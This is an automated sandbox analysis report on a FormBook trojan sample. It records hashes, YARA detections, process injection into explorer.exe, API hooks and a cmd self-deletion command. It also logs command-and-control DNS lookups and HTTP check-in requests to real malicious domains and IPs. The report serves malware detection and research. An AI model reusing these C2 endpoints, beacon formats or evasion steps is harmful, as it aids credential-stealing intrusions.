          http://james.newtonking.com/projects/json | CSA73881.exe, 00000000.00000002.315860973.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.314521039.00000000032FA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://www.newtonsoft.com/jsonschema | CSA73881.exe, 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp | false | | high
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    34.102.136.180 | segurambiental.com | United States | 15169 | GOOGLEUS | false
                    103.224.182.210 | www.comgmaik.com | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
                    75.2.26.18 | www.browardhomeappraisal.com | United States | 16509 | AMAZON-02US | true
                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:680378
                    Start date and time: 2022-08-08 14:24:10 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 10m 55s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:CSA73881.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:32
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@8/1@5/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 93.6% (good quality ratio 81.7%)
                    • Quality average: 71.9%
                    • Quality standard deviation: 33.3%
                    HCA Information:
                    • Successful, ratio: 92%
                    • Number of executed functions: 130
                    • Number of non-executed functions: 156
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Adjust boot time
                    • Enable AMSI
                    • Override analysis time to 240s for sample files taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 23.211.6.115
                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                    • Not all processes were analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    No simulations
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                    www.browardhomeappraisal.com | issu 06042022.exe | | malicious | | 75.2.26.18
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                    No context
                    No context
                    Process:C:\Users\user\Desktop\CSA73881.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1537
                    Entropy (8bit):5.3478589519339295
                    Encrypted:false
                    SSDEEP:48:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzvFHLHKdHKBqHKs:Pq5qXEwCYqhQnoPtIxHeqzNrqdq4qs
                    MD5:F6D3657BD1FBEF54E7F7BACB2497E327
                    SHA1:A0A712015C242DCC28B69CDF567F594627C9CFA0
                    SHA-256:5B16B4A3E65F04484B12171163A2A739409FA7F8C3D69BF9BAD961618D973301
                    SHA-512:0231195A111259A3AA48526DCBEA98394099794C710C3FB8E0E12E2B4D30C60FB4064F7F4F671866FB0D94585E23B73C1270440242B25DA60CCFFA82B0B74306
                    Malicious:true
                    Reputation:moderate, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.138316897620068
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    • Win32 Executable (generic) a (10002005/4) 49.78%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:CSA73881.exe
                    File size:2187264
                    MD5:3ed3236517a40602d654555bc912d926
                    SHA1:16dc042b543fe473703e711844f508d353d6d6af
                    SHA256:3702b6cfa76e492d56bd9da5f99f7ff805e32c16b3840ee66bb13a812f5d3155
                    SHA512:05c6c1d72929e8221522452ce757467a05b07a6e6a8a85ef6f0f16f8dc052068fdb54636f8526dd0eeea7c9fe743dcc4eba6fb84f36cc4a3bbc82b7d057f93d2
                    SSDEEP:49152:lYnRpC+ONzKBm/z2DhChFGTbQAbW0S748:lKRpjON1KbZbWH48
                    TLSH:48A57C3169562B8B60317CCB841A669FEF717D61DB3240794DB3192B3D228B384FA637
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g..b..............0..R!..........q!.. ........@.. ........................!...........`................................
                    Icon Hash:b2a88c96b2ca6a72
                    Entrypoint:0x6171ae
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x62F0C767 [Mon Aug 8 08:20:55 2022 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al (repeated 97 times)
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x217154 | 0x57 | .text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x218000 | 0xa00 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x21a000 | 0xc | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x2000 | 0x2151b4 | 0x215200 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rsrc | 0x218000 | 0xa00 | 0xa00 | False | 0.425 | data | 4.28766916412272 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc | 0x21a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Name | RVA | Size | Type | Language | Country
                    RT_ICON | 0x218100 | 0x2e8 | data | |
                    RT_GROUP_ICON | 0x2183f8 | 0x14 | data | |
                    RT_VERSION | 0x21841c | 0x3a6 | data | |
                    RT_MANIFEST | 0x2187d4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                    DLL | Import
                    mscoree.dll | _CorExeMain

                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    08/08/22-14:28:06.715465 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49841 | 80 | 192.168.2.3 | 34.102.136.180
                    08/08/22-14:29:11.618333 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49846 | 80 | 192.168.2.3 | 103.224.182.210
                    08/08/22-14:29:11.618333 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49846 | 80 | 192.168.2.3 | 103.224.182.210
                    08/08/22-14:28:06.715465 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49841 | 80 | 192.168.2.3 | 34.102.136.180
                    08/08/22-14:29:11.618333 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49846 | 80 | 192.168.2.3 | 103.224.182.210
                    08/08/22-14:28:06.715465 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49841 | 80 | 192.168.2.3 | 34.102.136.180

                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                    Aug 8, 2022 14:27:44.390386105 CEST | 192.168.2.3 | 8.8.8.8 | 0x8d48 | Standard query (0) | www.merendri.com | A (IP address) | IN (0x0001)
                    Aug 8, 2022 14:28:06.667161942 CEST | 192.168.2.3 | 8.8.8.8 | 0xc027 | Standard query (0) | www.segurambiental.com | A (IP address) | IN (0x0001)
                    Aug 8, 2022 14:28:27.326817036 CEST | 192.168.2.3 | 8.8.8.8 | 0xa489 | Standard query (0) | www.browardhomeappraisal.com | A (IP address) | IN (0x0001)
                    Aug 8, 2022 14:28:48.541207075 CEST | 192.168.2.3 | 8.8.8.8 | 0x6e44 | Standard query (0) | www.esrfy.xyz | A (IP address) | IN (0x0001)
                    Aug 8, 2022 14:29:11.241316080 CEST | 192.168.2.3 | 8.8.8.8 | 0x6c24 | Standard query (0) | www.comgmaik.com | A (IP address) | IN (0x0001)

                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                    Aug 8, 2022 14:27:44.414792061 CEST | 8.8.8.8 | 192.168.2.3 | 0x8d48 | Name error (3) | www.merendri.com | none | none | A (IP address) | IN (0x0001)
                    Aug 8, 2022 14:28:06.691601038 CEST | 8.8.8.8 | 192.168.2.3 | 0xc027 | No error (0) | www.segurambiental.com | segurambiental.com | | CNAME (Canonical name) | IN (0x0001)
                    Aug 8, 2022 14:28:06.691601038 CEST | 8.8.8.8 | 192.168.2.3 | 0xc027 | No error (0) | segurambiental.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                    Aug 8, 2022 14:28:27.359499931 CEST | 8.8.8.8 | 192.168.2.3 | 0xa489 | No error (0) | www.browardhomeappraisal.com | | 75.2.26.18 | A (IP address) | IN (0x0001)
                    Aug 8, 2022 14:28:27.359499931 CEST | 8.8.8.8 | 192.168.2.3 | 0xa489 | No error (0) | www.browardhomeappraisal.com | | 99.83.153.108 | A (IP address) | IN (0x0001)
                    Aug 8, 2022 14:28:48.566221952 CEST | 8.8.8.8 | 192.168.2.3 | 0x6e44 | Name error (3) | www.esrfy.xyz | none | none | A (IP address) | IN (0x0001)
                    Aug 8, 2022 14:29:11.417627096 CEST | 8.8.8.8 | 192.168.2.3 | 0x6c24 | No error (0) | www.comgmaik.com | | 103.224.182.210 | A (IP address) | IN (0x0001)

                    • www.segurambiental.com
                    • www.browardhomeappraisal.com
                    • www.comgmaik.com

                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.3 | 49841 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

                    Timestamp | kBytes transferred | Direction | Data
                    Aug 8, 2022 14:28:06.715465069 CEST | 12256 | OUT | GET /mh76/?Axo=j8MnV1AauDvQLYEDQHkxR7wEsLuzS8wOqoRJGUEtb1NYKXHLD1QrWCJCw/4m9jwcj9zX&e0Dd=gPHX06 HTTP/1.1
                    Host: www.segurambiental.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Aug 8, 2022 14:28:06.831450939 CEST | 12256 | IN | HTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Mon, 08 Aug 2022 12:28:06 GMT
                    Content-Type: text/html
                    Content-Length: 291
                    ETag: "62f0fdc3-123"
                    Via: 1.1 google
                    Connection: close
                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.3 | 49844 | 75.2.26.18 | 80 | C:\Windows\explorer.exe

                    Timestamp | kBytes transferred | Direction | Data
                    Aug 8, 2022 14:28:27.382595062 CEST | 12271 | OUT | GET /mh76/?Axo=ZKvJ8T01Uu5swSUTolvzZP3eEu33eLq9PUpXuYL3kSIE+YGu43QnDiKj3vyinvzv5HiX&e0Dd=gPHX06 HTTP/1.1
                    Host: www.browardhomeappraisal.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Aug 8, 2022 14:28:27.562855005 CEST | 12271 | IN | HTTP/1.1 403 Forbidden
                    Server: awselb/2.0
                    Date: Mon, 08 Aug 2022 12:28:27 GMT
                    Content-Type: text/html
                    Content-Length: 118
                    Connection: close
                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    2 | 192.168.2.3 | 49846 | 103.224.182.210 | 80 | C:\Windows\explorer.exe

                    Timestamp | kBytes transferred | Direction | Data
                    Aug 8, 2022 14:29:11.618333101 CEST | 12279 | OUT | GET /mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06 HTTP/1.1
                    Host: www.comgmaik.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Aug 8, 2022 14:29:11.821754932 CEST | 12279 | IN | HTTP/1.1 302 Found
                    Date: Mon, 08 Aug 2022 12:29:11 GMT
                    Server: Apache/2.4.38 (Debian)
                    Set-Cookie: __tad=1659961751.8786110; expires=Thu, 05-Aug-2032 12:29:11 GMT; Max-Age=315360000
                    Location: http://ww38.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=UTF-8


                    Code Manipulations

                    Function Name | Hook Type | Active in Processes
                    PeekMessageA | INLINE | explorer.exe
                    PeekMessageW | INLINE | explorer.exe
                    GetMessageW | INLINE | explorer.exe
                    GetMessageA | INLINE | explorer.exe

                    Function Name | Hook Type | New Data
                    PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xED
                    PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xED
                    GetMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xED
                    GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xED

                    Target ID:0
                    Start time:14:25:09
                    Start date:08/08/2022
                    Path:C:\Users\user\Desktop\CSA73881.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\CSA73881.exe"
                    Imagebase:0xde0000
                    File size:2187264 bytes
                    MD5 hash:3ED3236517A40602D654555BC912D926
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.315621485.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                    Reputation:low

                    Target ID:14
                    Start time:14:25:41
                    Start date:08/08/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Imagebase:0x8e0000
                    File size:41064 bytes
                    MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Target ID:16
                    Start time:14:25:46
                    Start date:08/08/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff6b8cf0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Target ID:28
                    Start time:14:26:55
                    Start date:08/08/2022
                    Path:C:\Windows\SysWOW64\control.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\control.exe
                    Imagebase:0x890000
                    File size:114688 bytes
                    MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:moderate

                    Target ID:29
                    Start time:14:27:01
                    Start date:08/08/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Imagebase:0xc20000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:30
                    Start time:14:27:02
                    Start date:08/08/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                      Execution Graph

                      Execution Coverage:5%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:239
                      Total number of Limit Nodes:20
                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 188 325a9e8-325aa04 189 325ac18-325ac1f 188->189 190 325aa0a-325aa10 188->190 193 325ac21-325ac2d 189->193 191 325aa16-325aa21 190->191 192 325abad-325abb0 190->192 195 325aa26-325aa2f 191->195 196 325aa23 191->196 194 325abb2-325abb7 192->194 197 325abbc-325abbf 194->197 198 325abb9 194->198 199 325aa35-325aa46 195->199 200 325ac30-325ac79 call 325a9e8 195->200 196->195 197->200 201 325abc1-325abd2 197->201 198->197 202 325aa4d-325aa5b 199->202 203 325aa48-325aa4b 199->203 218 325ac7f-325ac84 200->218 219 325ad1b-325ad22 200->219 204 325abd4-325abde 201->204 205 325abe0-325abe2 201->205 202->200 207 325aa61-325aa6e 202->207 203->202 204->193 208 325abe4-325abe7 205->208 209 325abe9 205->209 211 325aa70-325aa75 207->211 212 325aa7a-325aa7f 207->212 213 325abec-325abee 208->213 209->213 211->193 215 325aa84-325aa8e 212->215 216 325aa81 212->216 213->194 217 325abf0-325abfe 213->217 215->200 220 325aa94-325aaa7 215->220 216->215 217->200 223 325ac00-325ac0d 217->223 224 325ac86-325ac9b 218->224 225 325acea-325acf9 218->225 226 325adb0-325adb9 219->226 227 325ad28 219->227 221 325aaa9-325aabc 220->221 222 325aadb-325aae0 220->222 221->200 228 325aac2-325aacf 221->228 229 325aae5-325aaef 222->229 230 325aae2 222->230 231 325ac14-325ac16 223->231 232 325ac0f-325ac12 223->232 251 325acb1-325acbe 224->251 252 325ac9d-325acaa 224->252 257 325ad01-325ad0a 225->257 233 325adf3-325ae35 call 3258aac 226->233 234 325adbb-325adc8 226->234 235 325ad74-325ad7d 227->235 236 325ad51-325ad5a 227->236 237 325ad93-325ad9c 227->237 238 325ad2f-325ad38 227->238 228->222 239 325aad1-325aad6 228->239 229->200 240 325aaf5-325ab08 229->240 230->229 231->193 232->231 268 325ae37-325ae45 call 325b098 233->268 269 325ae4b-325ae4f 233->269 234->233 247 325adca-325adf0 234->247 235->233 244 325ad7f-325ad91 235->244 236->233 243 325ad60-325ad72 236->243 237->233 245 325ad9e-325ada8 237->245 238->233 242 325ad3e-325ad4f 238->242 239->193 249 325ab3c-325ab41 
